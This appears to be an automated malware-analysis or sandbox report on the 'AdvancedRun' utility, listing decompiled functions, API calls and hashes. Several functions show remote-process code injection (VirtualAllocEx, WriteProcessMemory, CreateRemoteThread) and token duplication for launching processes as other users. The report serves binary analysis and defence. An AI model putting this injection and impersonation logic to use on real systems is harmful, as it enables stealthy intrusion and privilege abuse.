                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                  • memset.MSVCRT ref: 0040A66E
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                  • API String ID: 1572607441-20550370
                                                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040289F(intOrPtr* __esi) {
                                                                                                  				void* _t9;
                                                                                                  				struct HINSTANCE__* _t10;
                                                                                                  				_Unknown_base(*)()* _t14;
                                                                                                  
                                                                                                  				if( *(__esi + 0x10) == 0) {
                                                                                                  					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                  					 *(__esi + 0x10) = _t10;
                                                                                                  					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                  					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                  					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                  					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                  					 *(__esi + 8) = _t14;
                                                                                                  					return _t14;
                                                                                                  				}
                                                                                                  				return _t9;
                                                                                                  			}






                                                                                                  0x004028a3
                                                                                                  0x004028ab
                                                                                                  0x004028bd
                                                                                                  0x004028ca
                                                                                                  0x004028d7
                                                                                                  0x004028e3
                                                                                                  0x004028e6
                                                                                                  0x004028e8
                                                                                                  0x00000000
                                                                                                  0x004028eb
                                                                                                  0x004028ec

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                  • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                  • API String ID: 2238633743-1970996977
                                                                                                  • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                  • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                  • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                  • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                  				void* _v8;
                                                                                                  				char _v12;
                                                                                                  				char* _v20;
                                                                                                  				long _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				char* _v36;
                                                                                                  				signed int _v40;
                                                                                                  				void _v44;
                                                                                                  				char _v48;
                                                                                                  				char _v52;
                                                                                                  				struct _OSVERSIONINFOW _v328;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t40;
                                                                                                  				intOrPtr* _t44;
                                                                                                  				void* _t49;
                                                                                                  				struct HINSTANCE__** _t54;
                                                                                                  				signed int _t55;
                                                                                                  
                                                                                                  				_t54 = __eax;
                                                                                                  				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                  				GetVersionExW( &_v328);
                                                                                                  				if(_v328.dwMajorVersion < 6) {
                                                                                                  					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                  				}
                                                                                                  				E0040A1EF(_t54);
                                                                                                  				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                  				if(_t44 != 0) {
                                                                                                  					_t55 = 8;
                                                                                                  					memset( &_v44, 0, _t55 << 2);
                                                                                                  					_v12 = 0;
                                                                                                  					asm("stosd");
                                                                                                  					_v36 =  &_v12;
                                                                                                  					_v20 =  &_v52;
                                                                                                  					_v48 = 0x24;
                                                                                                  					_v44 = 0x10003;
                                                                                                  					_v40 = _t55;
                                                                                                  					_v28 = 0x10004;
                                                                                                  					_v24 = 4;
                                                                                                  					_a16 = 0;
                                                                                                  					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					return  !( ~_t40) & _a16;
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}




















                                                                                                  0x0040a27d
                                                                                                  0x0040a286
                                                                                                  0x0040a290
                                                                                                  0x0040a29d
                                                                                                  0x00000000
                                                                                                  0x0040a32f
                                                                                                  0x0040a29f
                                                                                                  0x0040a2a4
                                                                                                  0x0040a2ad
                                                                                                  0x0040a2b6
                                                                                                  0x0040a2bc
                                                                                                  0x0040a2be
                                                                                                  0x0040a2c4
                                                                                                  0x0040a2c8
                                                                                                  0x0040a2ce
                                                                                                  0x0040a2e3
                                                                                                  0x0040a2ed
                                                                                                  0x0040a2fb
                                                                                                  0x0040a2fe
                                                                                                  0x0040a305
                                                                                                  0x0040a30c
                                                                                                  0x0040a30f
                                                                                                  0x0040a313
                                                                                                  0x00000000
                                                                                                  0x0040a31a
                                                                                                  0x0040a338

                                                                                                  APIs
                                                                                                  • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                  • String ID: $
                                                                                                  • API String ID: 283512611-3993045852
                                                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                  				struct tagPOINT _v12;
                                                                                                  				void* __esi;
                                                                                                  				void* _t47;
                                                                                                  				struct HBRUSH__* _t56;
                                                                                                  				void* _t61;
                                                                                                  				unsigned int _t63;
                                                                                                  				void* _t68;
                                                                                                  				struct HWND__* _t69;
                                                                                                  				struct HWND__* _t70;
                                                                                                  				void* _t73;
                                                                                                  				unsigned int _t74;
                                                                                                  				struct HWND__* _t76;
                                                                                                  				struct HWND__* _t77;
                                                                                                  				struct HWND__* _t78;
                                                                                                  				struct HWND__* _t79;
                                                                                                  				unsigned int _t85;
                                                                                                  				struct HWND__* _t87;
                                                                                                  				struct HWND__* _t89;
                                                                                                  				struct HWND__* _t90;
                                                                                                  				struct tagPOINT _t96;
                                                                                                  				struct tagPOINT _t98;
                                                                                                  				signed short _t103;
                                                                                                  				void* _t106;
                                                                                                  				void* _t117;
                                                                                                  
                                                                                                  				_t106 = __edx;
                                                                                                  				_push(__ecx);
                                                                                                  				_push(__ecx);
                                                                                                  				_t47 = _a4 - 0x110;
                                                                                                  				_t117 = __ecx;
                                                                                                  				if(_t47 == 0) {
                                                                                                  					__eflags =  *0x40feb0;
                                                                                                  					if(__eflags != 0) {
                                                                                                  						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                  					} else {
                                                                                                  						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                  						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                  					}
                                                                                                  					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                  					E0040103E(_t117, __eflags);
                                                                                                  					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                  					goto L30;
                                                                                                  				} else {
                                                                                                  					_t61 = _t47 - 1;
                                                                                                  					if(_t61 == 0) {
                                                                                                  						_t103 = _a8;
                                                                                                  						_t63 = _t103 >> 0x10;
                                                                                                  						__eflags = _t103 - 1;
                                                                                                  						if(_t103 == 1) {
                                                                                                  							L24:
                                                                                                  							__eflags = _t63;
                                                                                                  							if(_t63 != 0) {
                                                                                                  								goto L30;
                                                                                                  							} else {
                                                                                                  								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                  								DeleteObject( *(_t117 + 0x43c));
                                                                                                  								goto L8;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							__eflags = _t103 - 2;
                                                                                                  							if(_t103 != 2) {
                                                                                                  								goto L30;
                                                                                                  							} else {
                                                                                                  								goto L24;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t68 = _t61 - 0x27;
                                                                                                  						if(_t68 == 0) {
                                                                                                  							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                  							__eflags = _a12 - _t69;
                                                                                                  							if(_a12 != _t69) {
                                                                                                  								__eflags =  *0x40ff30;
                                                                                                  								if( *0x40ff30 == 0) {
                                                                                                  									goto L30;
                                                                                                  								} else {
                                                                                                  									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                  									__eflags = _a12 - _t70;
                                                                                                  									if(_a12 != _t70) {
                                                                                                  										goto L30;
                                                                                                  									} else {
                                                                                                  										goto L18;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								L18:
                                                                                                  								SetBkMode(_a8, 1);
                                                                                                  								SetTextColor(_a8, 0xc00000);
                                                                                                  								_t56 = GetSysColorBrush(0xf);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t73 = _t68 - 0xc8;
                                                                                                  							if(_t73 == 0) {
                                                                                                  								_t74 = _a12;
                                                                                                  								_t96 = _t74 & 0x0000ffff;
                                                                                                  								_v12.x = _t96;
                                                                                                  								_v12.y = _t74 >> 0x10;
                                                                                                  								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                  								_push(_v12.y);
                                                                                                  								_a8 = _t76;
                                                                                                  								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                  								__eflags = _t77 - _a8;
                                                                                                  								if(_t77 != _a8) {
                                                                                                  									__eflags =  *0x40ff30;
                                                                                                  									if( *0x40ff30 == 0) {
                                                                                                  										goto L30;
                                                                                                  									} else {
                                                                                                  										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                  										_push(_v12.y);
                                                                                                  										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                  										__eflags = _t79 - _t78;
                                                                                                  										if(_t79 != _t78) {
                                                                                                  											goto L30;
                                                                                                  										} else {
                                                                                                  											goto L13;
                                                                                                  										}
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									L13:
                                                                                                  									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                  									goto L8;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								if(_t73 != 0) {
                                                                                                  									L30:
                                                                                                  									_t56 = 0;
                                                                                                  									__eflags = 0;
                                                                                                  								} else {
                                                                                                  									_t85 = _a12;
                                                                                                  									_t98 = _t85 & 0x0000ffff;
                                                                                                  									_v12.x = _t98;
                                                                                                  									_v12.y = _t85 >> 0x10;
                                                                                                  									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                  									_push(_v12.y);
                                                                                                  									_a8 = _t87;
                                                                                                  									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                  										__eflags =  *0x40ff30;
                                                                                                  										if( *0x40ff30 == 0) {
                                                                                                  											goto L30;
                                                                                                  										} else {
                                                                                                  											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                  											_push(_v12.y);
                                                                                                  											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                  											__eflags = _t90 - _t89;
                                                                                                  											if(_t90 != _t89) {
                                                                                                  												goto L30;
                                                                                                  											} else {
                                                                                                  												_push(0x40ff30);
                                                                                                  												goto L7;
                                                                                                  											}
                                                                                                  										}
                                                                                                  									} else {
                                                                                                  										_push(_t117 + 0x23e);
                                                                                                  										L7:
                                                                                                  										_push( *(_t117 + 0x10));
                                                                                                  										E00404F7E();
                                                                                                  										L8:
                                                                                                  										_t56 = 1;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t56;
                                                                                                  			}



























                                                                                                  0x00401093
                                                                                                  0x00401096
                                                                                                  0x00401097
                                                                                                  0x0040109b
                                                                                                  0x004010a3
                                                                                                  0x004010a5
                                                                                                  0x00401270
                                                                                                  0x00401278
                                                                                                  0x004012b3
                                                                                                  0x0040127a
                                                                                                  0x00401293
                                                                                                  0x004012a2
                                                                                                  0x004012a2
                                                                                                  0x004012c1
                                                                                                  0x004012d9
                                                                                                  0x004012ea
                                                                                                  0x004012ec
                                                                                                  0x004012f6
                                                                                                  0x00000000
                                                                                                  0x004010ab
                                                                                                  0x004010ab
                                                                                                  0x004010ac
                                                                                                  0x00401231
                                                                                                  0x00401236
                                                                                                  0x00401239
                                                                                                  0x0040123d
                                                                                                  0x00401249
                                                                                                  0x00401249
                                                                                                  0x0040124c
                                                                                                  0x00000000
                                                                                                  0x00401252
                                                                                                  0x00401259
                                                                                                  0x00401265
                                                                                                  0x00000000
                                                                                                  0x00401265
                                                                                                  0x0040123f
                                                                                                  0x0040123f
                                                                                                  0x00401243
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00401243
                                                                                                  0x004010b2
                                                                                                  0x004010b2
                                                                                                  0x004010b5
                                                                                                  0x004011e1
                                                                                                  0x004011e3
                                                                                                  0x004011e6
                                                                                                  0x0040120e
                                                                                                  0x00401216
                                                                                                  0x00000000
                                                                                                  0x0040121c
                                                                                                  0x00401224
                                                                                                  0x00401226
                                                                                                  0x00401229
                                                                                                  0x00000000
                                                                                                  0x0040122f
                                                                                                  0x00000000
                                                                                                  0x0040122f
                                                                                                  0x00401229
                                                                                                  0x004011e8
                                                                                                  0x004011e8
                                                                                                  0x004011ed
                                                                                                  0x004011fb
                                                                                                  0x00401203
                                                                                                  0x00401203
                                                                                                  0x004010bb
                                                                                                  0x004010bb
                                                                                                  0x004010c0
                                                                                                  0x00401151
                                                                                                  0x0040115a
                                                                                                  0x00401168
                                                                                                  0x0040116b
                                                                                                  0x0040116e
                                                                                                  0x00401170
                                                                                                  0x00401173
                                                                                                  0x00401180
                                                                                                  0x00401182
                                                                                                  0x00401185
                                                                                                  0x004011a4
                                                                                                  0x004011ac
                                                                                                  0x00000000
                                                                                                  0x004011b2
                                                                                                  0x004011ba
                                                                                                  0x004011bc
                                                                                                  0x004011c7
                                                                                                  0x004011c9
                                                                                                  0x004011cb
                                                                                                  0x00000000
                                                                                                  0x004011d1
                                                                                                  0x00000000
                                                                                                  0x004011d1
                                                                                                  0x004011cb
                                                                                                  0x00401187
                                                                                                  0x00401187
                                                                                                  0x00401199
                                                                                                  0x00000000
                                                                                                  0x00401199
                                                                                                  0x004010c6
                                                                                                  0x004010c8
                                                                                                  0x004012fd
                                                                                                  0x004012fd
                                                                                                  0x004012fd
                                                                                                  0x004010ce
                                                                                                  0x004010ce
                                                                                                  0x004010d7
                                                                                                  0x004010e5
                                                                                                  0x004010e8
                                                                                                  0x004010eb
                                                                                                  0x004010ed
                                                                                                  0x004010f0
                                                                                                  0x00401102
                                                                                                  0x0040111d
                                                                                                  0x00401125
                                                                                                  0x00000000
                                                                                                  0x0040112b
                                                                                                  0x00401133
                                                                                                  0x00401135
                                                                                                  0x00401140
                                                                                                  0x00401142
                                                                                                  0x00401144
                                                                                                  0x00000000
                                                                                                  0x0040114a
                                                                                                  0x0040114a
                                                                                                  0x00000000
                                                                                                  0x0040114a
                                                                                                  0x00401144
                                                                                                  0x00401104
                                                                                                  0x0040110a
                                                                                                  0x0040110b
                                                                                                  0x0040110b
                                                                                                  0x0040110e
                                                                                                  0x00401115
                                                                                                  0x00401117
                                                                                                  0x00401117
                                                                                                  0x00401102
                                                                                                  0x004010c8
                                                                                                  0x004010c0
                                                                                                  0x004010b5
                                                                                                  0x004010ac
                                                                                                  0x00401303

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                  • String ID: AdvancedRun
                                                                                                  • API String ID: 829165378-481304740
                                                                                                  • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                  • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                  • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                  • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 45%
                                                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                  				void _v259;
                                                                                                  				void _v260;
                                                                                                  				void _v515;
                                                                                                  				void _v516;
                                                                                                  				char _v1048;
                                                                                                  				void _v1052;
                                                                                                  				void _v1056;
                                                                                                  				void _v1560;
                                                                                                  				long _v1580;
                                                                                                  				void _v3626;
                                                                                                  				char _v3628;
                                                                                                  				void _v5674;
                                                                                                  				char _v5676;
                                                                                                  				void _v9770;
                                                                                                  				short _v9772;
                                                                                                  				void* __edi;
                                                                                                  				void* _t45;
                                                                                                  				void* _t60;
                                                                                                  				int _t61;
                                                                                                  				int _t63;
                                                                                                  				int _t64;
                                                                                                  				long _t68;
                                                                                                  				struct HWND__* _t94;
                                                                                                  				signed int _t103;
                                                                                                  				intOrPtr _t127;
                                                                                                  				unsigned int _t130;
                                                                                                  				void* _t132;
                                                                                                  				void* _t135;
                                                                                                  
                                                                                                  				E0040B550(0x2628, __ecx);
                                                                                                  				_t45 = _a8 - 0x110;
                                                                                                  				if(_t45 == 0) {
                                                                                                  					E00404DA9(__edx, _a4, 4);
                                                                                                  					_v9772 = 0;
                                                                                                  					memset( &_v9770, 0, 0xffe);
                                                                                                  					_t103 = 5;
                                                                                                  					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                  					memset( &_v1560, 0, 0x1f6);
                                                                                                  					_v260 = 0;
                                                                                                  					memset( &_v259, 0, 0xff);
                                                                                                  					_v516 = 0;
                                                                                                  					memset( &_v515, 0, 0xff);
                                                                                                  					_v5676 = 0;
                                                                                                  					memset( &_v5674, 0, 0x7fe);
                                                                                                  					_v3628 = 0;
                                                                                                  					memset( &_v3626, 0, 0x7fe);
                                                                                                  					_t135 = _t132 + 0x5c;
                                                                                                  					_t60 = GetCurrentProcess();
                                                                                                  					_t105 =  &_v260;
                                                                                                  					_a8 = _t60;
                                                                                                  					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                  					__eflags = _t61;
                                                                                                  					if(_t61 != 0) {
                                                                                                  						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                  						_pop(_t105);
                                                                                                  					}
                                                                                                  					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                  					__eflags = _t63;
                                                                                                  					if(_t63 != 0) {
                                                                                                  						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                  						_pop(_t105);
                                                                                                  					}
                                                                                                  					_t64 = E00404BD3();
                                                                                                  					__eflags = _t64;
                                                                                                  					if(_t64 == 0) {
                                                                                                  						E004090EE();
                                                                                                  					} else {
                                                                                                  						E00409172();
                                                                                                  					}
                                                                                                  					__eflags =  *0x4101b8; // 0x0
                                                                                                  					if(__eflags != 0) {
                                                                                                  						L17:
                                                                                                  						_v1056 = 0;
                                                                                                  						memset( &_v1052, 0, 0x218);
                                                                                                  						_t127 =  *0x40f5d4; // 0x0
                                                                                                  						_t135 = _t135 + 0xc;
                                                                                                  						_t68 = GetCurrentProcessId();
                                                                                                  						_push(_t127);
                                                                                                  						_push(_t68);
                                                                                                  						 *0x40f84c = 0;
                                                                                                  						E004092F0(_t105, __eflags);
                                                                                                  						__eflags =  *0x40f84c; // 0x0
                                                                                                  						if(__eflags != 0) {
                                                                                                  							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                  							_t135 = _t135 + 0xc;
                                                                                                  							__eflags =  *0x40f84c; // 0x0
                                                                                                  							if(__eflags != 0) {
                                                                                                  								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L20;
                                                                                                  					} else {
                                                                                                  						__eflags =  *0x4101bc; // 0x0
                                                                                                  						if(__eflags == 0) {
                                                                                                  							L20:
                                                                                                  							_push( &_v3628);
                                                                                                  							_push( &_v5676);
                                                                                                  							_push( *0x40f3b0);
                                                                                                  							_push( *0x40f3bc);
                                                                                                  							_push( *0x40f3ac);
                                                                                                  							_push( *0x40f394);
                                                                                                  							_push( *0x40f398);
                                                                                                  							_push( *0x40f3a0);
                                                                                                  							_push( *0x40f3a4);
                                                                                                  							_push( *0x40f39c);
                                                                                                  							_push( *0x40f3a8);
                                                                                                  							_push( &_v1580);
                                                                                                  							_push( *0x40f5d4);
                                                                                                  							_push( *0x40f5c8);
                                                                                                  							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                  							_push(0x800);
                                                                                                  							_push( &_v9772);
                                                                                                  							L0040B1EC();
                                                                                                  							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                  							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                  							L21:
                                                                                                  							return 0;
                                                                                                  						}
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				if(_t45 == 1) {
                                                                                                  					_t130 = _a12;
                                                                                                  					if(_t130 >> 0x10 == 0) {
                                                                                                  						if(_t130 == 3) {
                                                                                                  							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                  							_a4 = _t94;
                                                                                                  							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                  							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                  							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				goto L21;
                                                                                                  			}































                                                                                                  0x00408ae3
                                                                                                  0x00408aeb
                                                                                                  0x00408af3
                                                                                                  0x00408b76
                                                                                                  0x00408b8a
                                                                                                  0x00408b91
                                                                                                  0x00408b98
                                                                                                  0x00408bb1
                                                                                                  0x00408bb3
                                                                                                  0x00408bc6
                                                                                                  0x00408bcc
                                                                                                  0x00408bda
                                                                                                  0x00408be0
                                                                                                  0x00408bf3
                                                                                                  0x00408bfa
                                                                                                  0x00408c0b
                                                                                                  0x00408c12
                                                                                                  0x00408c17
                                                                                                  0x00408c1a
                                                                                                  0x00408c2c
                                                                                                  0x00408c39
                                                                                                  0x00408c3d
                                                                                                  0x00408c3f
                                                                                                  0x00408c41
